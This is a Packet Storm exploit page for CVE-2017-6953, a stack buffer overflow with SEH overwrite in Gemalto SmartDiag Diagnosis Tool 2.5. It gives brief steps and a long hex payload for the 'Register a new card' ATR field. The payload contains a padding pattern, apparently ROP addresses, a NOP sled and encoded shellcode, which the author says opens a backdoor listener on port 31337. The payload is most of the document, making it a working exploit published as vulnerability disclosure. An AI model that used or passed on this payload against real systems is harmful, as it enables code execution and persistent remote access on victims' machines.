exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Gemalto SmartDiag Diagnosis Tool 2.5 Buffer Overflow

Gemalto SmartDiag Diagnosis Tool 2.5 Buffer Overflow
Posted May 8, 2017
Authored by Majid Alqabandi

Gemalto SmartDiag Diagnosis Tool versions 2.5 and below buffer overflow exploit with SEH overwrite.

tags | exploit, overflow
advisories | CVE-2017-6953
SHA-256 | f0fdfc5111c06ba95a692a071f3afbae09ba4c4054c74f3f657156eeb1ad1664

Gemalto SmartDiag Diagnosis Tool 2.5 Buffer Overflow

Change Mirror Download
# Exploit Title: Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow
- SEH Overwrite
# Date: 16-03-2017
# Software Link: http://support.gemalto.com/index.php?id=download_tools
# Exploit Author: Majid Alqabandi
# Contact: https://www.linkedin.com/in/majidalqabandi/
# CVE: CVE-2017-6953
# Category: Local - command execution - Buffer Overflow - SEH Overwrite.

1. Description
SymDiag.exe is vulnerable to buffer overflow, SEH overwrite.
When trying to (Register a new card), Input fields are vulnerable to stack
overflow attack which leads to code execution and other possible security
threats.



2. Proof of Concept

The following PoC is provided code will:
- Exploit the vulnerability.
- Execute shell code.
- Create a backdoor on port 31337.

To exploit, start SmartDiag.exe tool, choose "Register a new card", on the
ATR use the following payload (Tested on Win7x64 & Win8x64 - SmartDiag
v2.5):

528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
52834000528340005283400052834000572b0410477f40008c214100f494
400041ed40003b4140003552011078ab0110010000009cf2021000100000
328b031040000000d02203100120400026e6400090909090e2f500109090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
9090909090909090ddc1d97424f4bbc4aa698a5833c9b15683e8fc315814
0358d0489c7630055f87c076e962f1a48de7a378c5aa4ff28b5ec4760450
6d3c725f6ef0ba33ac92464ee0747681f575bffcf524688aa7d81dce7bd8
f144c3a2749ab71876cb671630f30c70e102c162dd4d6e50954fa6a8567e
8667694e0b79ad69f30cc5898e161ef3549283531f046065ccd3e369b990
ac6d3c74c78ab57b081b8d5f8c4756c1952d39fec68ae65a8c39f3ddcf55
30d0efa55e638397c1df0b948af9ccdba1be432249bf4ae11defe4c01d64
f5edc82ba541a28b152212647cad4d947f67f892b153a974b06337ec3d85
adfe6b1d593d4896fe3eba8a57a9f2c46fd602c3dc7baa8496976fb4a9bd
c7bf92569dd151c6a2fb016b3060d1e2293f86a39c36425e86e070a35eca
3078a3d5b90d9ff1a9cb20be9d8376684b6221da253c9eb4a1b9ec06b7c5
38f15777954468b8714111a4e1aec86c11e550c4baa00154a752fc9bded0
f46325c87d61614e6e1bfa3b9088fb69AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA



3. Solution:
Vendor has been informed and confirmed the issue, no fix is available yet
from vendor.
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close